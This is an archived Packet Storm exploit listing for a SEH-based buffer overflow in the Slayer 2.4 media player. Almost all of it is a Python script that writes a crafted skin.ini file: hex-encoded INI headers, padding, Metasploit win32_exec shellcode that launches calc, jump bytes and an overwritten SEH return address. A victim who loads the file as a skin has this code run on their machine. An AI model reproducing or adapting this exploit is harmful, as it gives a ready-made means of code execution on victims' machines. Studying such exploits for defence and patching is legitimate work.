Slayer 2.4 Buffer Overflow

2009-05-27T00:00:00
ID PACKETSTORM:77821
Type packetstorm
Reporter SuNHouSe2
Modified 2009-05-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
print "**************************************************************************"  
print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n"  
print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n"  
print "[~]Email : sunhouse2@yahoo.com\n"  
print "[~]HOME : http://www.snakespc.com\n"   
print "[~]Tested on: Windows XP Pro SP3 (FR)\n"  
print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n"  
print "**************************************************************************"   
  
import os  
  
header1=(  
"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64"  
"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62"  
"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61"  
"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72"  
"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73"  
"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70"  
"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d")  
  
header2=(  
"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67"  
"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f"  
"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61"  
"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33"  
"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34"  
"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34"  
"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c"  
"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53"  
"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75"  
"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41"  
"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f"  
"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39"  
"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53"  
"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32"  
"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f"  
"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72"  
"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30"  
"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36"  
"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d"  
"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c"  
"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59"  
"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46"  
"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d"  
"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39"  
"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e"  
"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72"  
"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33"  
"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a"  
"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69"  
"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36"  
"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35"  
"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46"  
"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36"  
"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d"  
"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c"  
"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31"  
"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35"  
"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53"  
"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35"  
"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a")  
  
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode=(  
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"  
"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79"  
"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75"  
"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31"  
"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a"  
"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18"  
"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7"  
"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54"  
"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38"  
"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c")  
  
payload = header1  
payload += "\x41"*(348-len(shellcode))  
payload += shellcode  
payload += "\xE9\x5B\xFF\xFF\xFF"  
payload += "\x90"*15  
payload += "\xEB\xEA\xFF\xFF"  
payload += "\x50\x37\x40"  
payload += header2  
try:  
os.mkdir("sunhouse")  
out_file = open(r'SuNHouSe/skin.ini', 'w')  
out_file.write(payload)  
out_file.close()  
raw_input("\nExploit file created!\n")  
except:  
print "Error"  
  
  
`